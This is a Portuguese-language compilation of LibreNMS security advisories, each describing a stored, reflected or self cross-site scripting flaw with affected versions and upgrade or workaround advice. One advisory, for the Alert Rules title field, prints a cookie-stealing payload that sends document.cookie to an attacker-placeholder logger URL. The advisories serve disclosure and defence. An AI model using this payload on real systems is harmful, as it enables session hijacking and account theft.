Raphaelcss

**Nome do software vulnerável e versões afetadas** Versões do LibreNMS anteriores à 24.10.0 **Descrição** Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada na guia “Serviços” da página “Dispositivo” permite que usuários autenticados injetem código JavaScript arbitrário por meio do parâmetro `descr` ao adicionar um serviço a um dispositivo. Isso pode resultar na execução de código malicioso no contexto das sessões de outros usuários, comprometendo potencialmente suas contas e permitindo ações não autorizadas. A vulnerabilidade é explorada pela injeção de uma carga XSS no parâmetro `descr`, que é refletida na guia “Serviços” do dispositivo. A causa principal é a falha do aplicativo em sanitizar o parâmetro `descr` antes de exibi-lo no HTML. **Recomendações** Para versões anteriores à 24.10.0, atualize para a versão 24.10.0 para corrigir a vulnerabilidade. Como solução temporária, considere restringir o acesso à guia “Serviços” da página do dispositivo ou desativar a capacidade de adicionar serviços aos dispositivos até que a atualização seja aplicada. Evite usar o parâmetro `descr` no endpoint da API afetado até que o problema seja resolvido.

Nome do software vulnerável e versões afetadas: Versões do LibreNMS anteriores à 24.10.0 Descrição: Uma vulnerabilidade de Stored Cross-Site Scripting (XSS) na página API-Access permite que usuários autenticados injetem JavaScript arbitrário por meio do parâmetro `token` ao criar um novo token de API. Isso pode resultar na execução de código malicioso no contexto das sessões de outros usuários, comprometendo suas contas e possibilitando ações não autorizadas. Recomendações: Para versões anteriores à 24.10.0, atualize para a versão 24.10.0 para corrigir a vulnerabilidade. Como solução temporária, considere restringir o acesso à página API-Access ou desativar a criação de novos tokens de API até que a atualização seja aplicada. Evite usar o parâmetro `token` no endpoint da API afetado até que o problema seja resolvido.

Nome do software vulnerável e versões afetadas: Versões do LibreNMS anteriores à 24.10.0 Descrição: Uma vulnerabilidade de Stored Cross-Site Scripting (XSS) na página “Gerenciar acesso do usuário” permite que usuários autenticados injetem JavaScript arbitrário por meio do parâmetro `bill name` ao criar uma nova fatura. Isso pode levar à execução de código malicioso ao acessar o menu suspenso “Acesso à fatura” na página “Gerenciar acesso” do usuário, comprometendo potencialmente as sessões do usuário e permitindo ações não autorizadas. Recomendações: Para versões anteriores à 24.10.0, atualize para a versão 24.10.0 para corrigir a vulnerabilidade. Como solução temporária, considere restringir o acesso à página “Gerenciar acesso do usuário” e ao menu suspenso “Acesso à fatura” para minimizar o risco de exploração. Evite usar o parâmetro `bill name` na página afetada até que o problema seja resolvido.

Nome do software vulnerável e versões afetadas: Versões do LibreNMS anteriores à 24.10.0 Descrição: Uma vulnerabilidade de Stored Cross-Site Scripting (XSS) na página “Capture Debug Information” permite que usuários autenticados injetem JavaScript arbitrário por meio do parâmetro `hostname` ao criar um novo dispositivo. Isso resulta na execução de código malicioso quando a página “Capture Debug Information” é visitada, redirecionando o usuário e enviando cookies não-httponly para um domínio controlado pelo invasor. Recomendações: Para versões anteriores à 24.10.0, atualize para a versão 24.10.0 para corrigir a vulnerabilidade. Como solução temporária, considere restringir o acesso à página “Capture Debug Information” para minimizar o risco de exploração. Evite usar o parâmetro `hostname` na página afetada até que o problema seja resolvido.

Nome do software vulnerável e versões afetadas: Versões do LibreNMS anteriores à 24.10.0 Descrição: Uma vulnerabilidade de Stored Cross-Site Scripting (XSS) na página “Port Settings” permite que usuários autenticados injetem JavaScript arbitrário através do parâmetro `name` ao criar um novo Port Group. Isso resulta na execução de código malicioso quando a página “Port Settings” é visitada após o Port Group afetado ser adicionado a um dispositivo, comprometendo potencialmente as sessões dos usuários e permitindo ações não autorizadas. Recomendações: Para versões anteriores à 24.10.0, atualize para a versão 24.10.0 para corrigir a vulnerabilidade. Como solução alternativa temporária, considere restringir o acesso à página “Configurações de porta” e evitar o uso do parâmetro `name` ao criar novos grupos de portas até que a atualização seja aplicada.

Nome do software vulnerável e versões afetadas: Versões do LibreNMS anteriores à 24.10.0 Descrição: Uma vulnerabilidade de Cross-Site Scripting (XSS) refletido no parâmetro `section` da guia de registros de um dispositivo permite que invasores injetem código JavaScript arbitrário. Essa vulnerabilidade resulta na execução de código malicioso quando um usuário acessa a página com um parâmetro `section` malicioso, comprometendo potencialmente sua sessão e permitindo ações não autorizadas. O problema decorre da falta de sanitização na função `report this()`. A vulnerabilidade permite que invasores executem JavaScript arbitrário no contexto da sessão de um usuário criando uma URL maliciosa, o que pode levar ao sequestro de sessão, ações não autorizadas ou exploração adicional por meio da injeção de scripts maliciosos. Recomendações: Para versões anteriores à 24.10.0, atualize para a versão 24.10.0 para corrigir a vulnerabilidade. Como solução temporária, considere restringir o acesso à guia de logs ou desativar a função `report this()` até que um patch esteja disponível. Evite usar o parâmetro `section` no endpoint da API afetado até que o problema seja resolvido.

Nome do software vulnerável e versões afetadas: Versões do LibreNMS anteriores à 24.10.0 Descrição: Uma vulnerabilidade de Stored Cross-Site Scripting (XSS) na seção “Serviços” da página Visão Geral do Dispositivo permite que usuários autenticados injetem JavaScript arbitrário por meio do parâmetro `name` ao adicionar um serviço a um dispositivo. Isso pode resultar na execução de código malicioso no contexto das sessões de outros usuários, comprometendo potencialmente suas contas e possibilitando ações não autorizadas. Recomendações: Para versões anteriores à 24.10.0, atualize para a versão 24.10.0 para corrigir a vulnerabilidade. Como solução temporária, considere restringir o acesso à seção “Serviços” da página Visão geral do dispositivo para minimizar o risco de exploração. Evite usar o parâmetro `name` no endpoint da API afetado até que o problema seja resolvido.

**Nome do software vulnerável e versões afetadas** Versões do LibreNMS anteriores à 24.10.0 **Descrição** Uma vulnerabilidade de Stored Cross-Site Scripting (XSS) na página “Configurações de porta” permite que usuários autenticados injetem JavaScript arbitrário por meio do parâmetro `descr` ao editar as configurações de porta de um dispositivo. Isso pode levar à execução de código malicioso quando a página “Configurações de porta” é acessada, comprometendo potencialmente a sessão do usuário e permitindo ações não autorizadas. **Recomendações** Para versões anteriores à 24.10.0, atualize para a versão 24.10.0 ou posterior para corrigir a vulnerabilidade. Como solução temporária, considere restringir o acesso à página “Configurações de porta” ou desativar a edição das configurações de porta do dispositivo até que a atualização seja aplicada. Evite usar o parâmetro `descr` no endpoint da API afetado até que o problema seja resolvido.

**Nome do software vulnerável e versões afetadas** Versões do LibreNMS anteriores à 24.10.0 **Descrição** Uma vulnerabilidade de tipo Stored Cross-Site Scripting (XSS) na página de visão geral do dispositivo permite que usuários autenticados injetem código JavaScript arbitrário por meio do parâmetro `overwrite ip` ao editar um dispositivo. Isso resulta na execução de código malicioso quando a página de visão geral do dispositivo é visitada, comprometendo potencialmente as contas de outros usuários. A vulnerabilidade ocorre ao editar um dispositivo, e um invasor pode injetar JavaScript arbitrário no parâmetro `overwrite ip`. O script malicioso é então executado no campo “IP atribuído” quando a página de visão geral do dispositivo é carregada. **Recomendações** Para versões anteriores à 24.10.0, atualize para a versão 24.10.0 ou posterior para corrigir a vulnerabilidade. Como solução alternativa temporária, considere restringir o acesso à página Visão geral do dispositivo ou desativar a edição de dispositivos para minimizar o risco de exploração. Evite usar o parâmetro `overwrite ip` no endpoint da API afetado até que o problema seja resolvido.

**Nome do software vulnerável e versões afetadas** Versões do LibreNMS anteriores à 24.10.0 **Descrição** Uma vulnerabilidade de Cross-Site Scripting (XSS) refletido no parâmetro `metric` dos endpoints “/wireless” e “/health” permite que invasores injetem JavaScript arbitrário, comprometendo potencialmente a sessão do usuário e permitindo ações não autorizadas. Isso ocorre devido à sanitização inadequada do parâmetro `metric`. Os invasores podem executar código malicioso quando um usuário acessa a página com um parâmetro `metric` malicioso. **Recomendações** Para versões anteriores à 24.10.0, atualize para a versão 24.10.0 ou posterior para corrigir a vulnerabilidade. Como solução temporária, considere restringir o acesso aos endpoints “/wireless” e “/health” para minimizar o risco de exploração. Evite usar o parâmetro `metric` nesses endpoints até que o problema seja resolvido.

**Nome do software vulnerável e versões afetadas** Versões do LibreNMS anteriores à 24.10.0 **Descrição** Uma vulnerabilidade de Stored Cross-Site Scripting (XSS) na guia “Custom OID” de um dispositivo permite que usuários autenticados injetem JavaScript arbitrário por meio do parâmetro `unit` ao criar um novo OID. Isso pode levar à execução de código malicioso no contexto das sessões de outros usuários, comprometendo suas contas e possibilitando ações não autorizadas. **Recomendações** Para versões anteriores à 24.10.0, atualize para a versão 24.10.0 para corrigir a vulnerabilidade. Como solução temporária, considere restringir o acesso à guia “Custom OID” ou desativar a capacidade de criar novos OIDs até que a atualização possa ser aplicada. Evite usar o parâmetro `unit` no endpoint da API afetado até que o problema seja resolvido.

**Nome do software vulnerável e versões afetadas** Versões do LibreNMS anteriores à 24.9.0 **Descrição** Uma vulnerabilidade de Stored Cross-Site Scripting (XSS) no recurso “Regras de Alerta” permite que usuários autenticados injetem JavaScript arbitrário através do campo ‘Título’. Isso pode levar à execução de código malicioso no contexto das sessões de outros usuários, comprometendo potencialmente suas contas e permitindo ações não autorizadas. A vulnerabilidade ocorre ao criar uma regra de alerta, pois o aplicativo não sanitiza adequadamente as entradas do usuário no campo “Título”. Por exemplo, uma carga útil como `test1'‘ autofocus onfocus="document.location='https://<attacker-url>/logger.php?c=’+document.cookie"` pode ser usada para acionar o XSS quando a página afetada é carregada, redirecionando automaticamente o usuário para o domínio controlado pelo invasor com quaisquer cookies não-httponly presentes. **Recomendações** Para versões anteriores à 24.9.0, atualize para a versão 24.9.0 ou posterior para permanecer protegido. Como solução temporária, considere restringir o acesso ao recurso “Regras de Alerta” até que o problema seja resolvido. Evite usar o campo `name` no recurso “Regras de Alerta” para injetar código JavaScript malicioso. Restrinja o uso do campo `title` para minimizar o risco de exploração.

**Nome do software vulnerável e versões afetadas** Versões do LibreNMS anteriores à 24.9.0 **Descrição** Uma vulnerabilidade de Stored Cross-Site Scripting (XSS) no recurso “Alert Transports” permite que usuários autenticados injetem JavaScript arbitrário através da seção ‘Detalhes’. Essa vulnerabilidade pode levar à execução de código malicioso no contexto das sessões de outros usuários, comprometendo potencialmente suas contas e permitindo ações não autorizadas. O aplicativo não sanitiza adequadamente a entrada do usuário no campo “Detalhes”, permitindo que um invasor injete e armazene JavaScript arbitrário. **Recomendações** Para versões anteriores à 24.9.0, atualize para a versão 24.9.0 para corrigir a vulnerabilidade. Como solução alternativa temporária, considere restringir o acesso ao recurso “Alert Transports” para minimizar o risco de exploração. Evite usar a seção “Detalhes” no recurso “Alert Transports” até que o problema seja resolvido.

**Nome do software vulnerável e versões afetadas** Versões do LibreNMS anteriores à 24.9.0 **Descrição** Uma vulnerabilidade de tipo Stored Cross-Site Scripting (XSS) no recurso “Device Dependencies” permite que usuários autenticados injetem código JavaScript arbitrário por meio do parâmetro `hostname`. Isso pode levar à execução de código malicioso no contexto das sessões de outros usuários, comprometendo potencialmente suas contas e permitindo ações não autorizadas. A vulnerabilidade ocorre ao criar um dispositivo no LibreNMS, e um invasor pode injetar JavaScript arbitrário no parâmetro `hostname`. Esse script malicioso é então executado quando outro usuário visita a página de dependências do dispositivo. **Recomendações** Para versões anteriores à 24.9.0, atualize para a versão 24.9.0 ou posterior para corrigir a vulnerabilidade. Como solução temporária, considere restringir o acesso ao recurso “Dependências do dispositivo” para minimizar o risco de exploração. Evite usar o parâmetro `hostname` no endpoint da API afetado até que o problema seja resolvido.

**Nome do software vulnerável e versões afetadas** LibreNMS (versões afetadas não especificadas) **Descrição** Uma vulnerabilidade de Self Cross-Site Scripting (Self-XSS) no recurso “Modelos de Alerta” permite que os usuários injetem código JavaScript arbitrário no nome do modelo de alerta. Esse script é executado imediatamente após o envio, mas não persiste após a atualização da página. A vulnerabilidade ocorre ao criar um modelo de alerta na interface do LibreNMS, onde o aplicativo sanitiza o campo “nome” ao armazená-lo no banco de dados, mas esse modelo recém-criado é imediatamente adicionado à tabela sem que qualquer sanitização seja aplicada ao nome. A causa principal dessa vulnerabilidade reside na falta de sanitização da variável `name` antes de ela ser renderizada na tabela. **Recomendações** No momento, não há informações sobre uma versão mais recente que contenha uma correção para esta vulnerabilidade.